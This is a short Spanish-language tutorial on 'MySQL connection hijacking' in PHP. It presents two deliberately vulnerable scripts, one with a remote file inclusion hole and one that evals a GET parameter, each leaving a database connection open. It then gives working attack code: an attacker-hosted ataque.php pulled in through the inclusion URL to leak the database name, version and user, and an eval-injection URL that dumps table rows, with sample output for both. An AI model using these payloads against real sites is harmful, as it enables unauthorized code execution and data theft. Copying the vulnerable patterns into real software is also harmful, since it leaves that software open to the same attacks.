Mysql Connection Hijacking

Hoy hablaré sobre la función mysql_close(), que sirve para cerrar conexiones mysql no-persistente que esten asociadas con el identificador de enlace especificado, en realidad no suele ser tan necesaria ya que las conexiones no persistentes son cerradas automáticamente al final de la ejecución del script.

Para mirar mas a fondo veamos un código vulnerable:

pagina.php <?php $host = "localhost"; $user = "root"; $pass = "rootpass"; $db = "carluys"; // Current $connect = mysql_connect($host,$user,$pass); mysql_select_db($db,$connect); $query = mysql_query("SELECT uname FROM lol"); while($lol = mysql_fetch_array($query)){ echo "we get it: ".$lol["uname"]."<br>"; } include($_GET["page"]); // SCRIPT HAVE RFI ?> Ahora crearé un código para atacar el archivo pagina.php y explotar su vulnerabilidad.

ataque.php

el código es el siguiente: <?php $ataque = mysql_query("SELECT concat_ws(0x3a,database(),version(),user());"); $a = mysql_fetch_array($ataque); echo $a[0]; ?> Pues solo tendríamos que alojar el archivo ataque.php en un servidor y comenzar a utilizarlo de esta forma: http://servidor/mysql-hijacking/pagina.php?page=http://servidor/atacar/ataque.php obtendríamos un resultado así:

we get it: secret admin
joo:5.1.37-1ubuntu5.1:root@localhost

Otro Ejemplo de Mysql Hijacking

script.php
<?php $connect = mysql_connect('127.0.0.1','root','password'); mysql_select_db('ejemplo',$connect); if(mysql_query('select * from nombres where id=1;')){ echo "Consulta ejecutada"; }else{ echo "No se pudo ejecutar la consulta "; } if(isset($_GET['v'])) { eval($_GET['v']); } ?> Como se puede ver no se a cerrado la conexión mysql no-persistente y tampoco se ah finalizado el script, ahora hagamos uso de la conexión mysql... http://servidor/script.php?v=$sql = mysql_query('select * from nombres');while ($row = mysql_fetch_assoc($sql)){ echo "<br>".$row['nombre'];} El resultado sería:

Consulta ejecutada
carlos
hector
jose